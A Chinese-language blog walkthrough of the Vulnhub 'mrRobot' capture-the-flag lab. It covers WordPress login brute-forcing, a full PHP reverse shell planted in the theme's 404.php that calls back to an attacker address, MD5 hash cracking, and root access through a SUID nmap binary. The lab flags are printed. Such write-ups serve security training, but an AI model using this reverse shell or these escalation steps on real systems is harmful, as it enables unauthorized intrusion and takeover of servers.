SfTian Vulnhub-mrRobot # mrRobot ## 收集资产 ```shell netdiscover -r 192.168.0.0/24 nmap -p- 192.168.0.133 #masscan -p 0-65535 192.168.0.136 nmap -sV -sC -p- -A 192.168.0.136 ``` | 端口 | 描述 | | ------- | ----- | | 80/tcp | http | | 443/tcp | https | ```shell dirb http://192.168.0.136 ``` 访问`http://192.168.0.136/0`为wordpress 在`robots.txt`发现有 ``` fsocity.dic key-1-of-3.txt ``` 两个文件,其中`fsocity.dic`为字典,`key-1-of-3.txt`拿到疑似flag1 ``` 073403c8a58a1f80d943455fb30724b9 ``` 将给的dic用来爆破wordpress的登录界面`http://192.168.0.136/wp-login` 使用burp的intruder模块爆破出疑似用户名`Elliot/elliot`,继续用burp爆破出密码`ER28-0652`   ## 建立shell 既然登录到Wordpress Admin那么就可以修改模板文件实现反向连接shell,这里修改404.php然后访问触发404即可 ```php <?php set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.0.128'; $port = 4444; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> ``` ## getshell 建立反向shell之后在/home/robot找到一个md5,拿去解密可得`abcdefghijklmnopqrstuvwxyz` ```shell cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b ``` 登录到robot拿到flag2 ```shell cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 ``` 查找SUID可执行内容 ```shell find / -perm -4000 2>/dev/nul ``` 可以发现有一个nmap具有SUID,进入交互模式输入sh即可提权并拿到flag3 ```shell nmap --interactive sh cd /root cat key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4 ``` 取消回复 发表新评论 提交评论
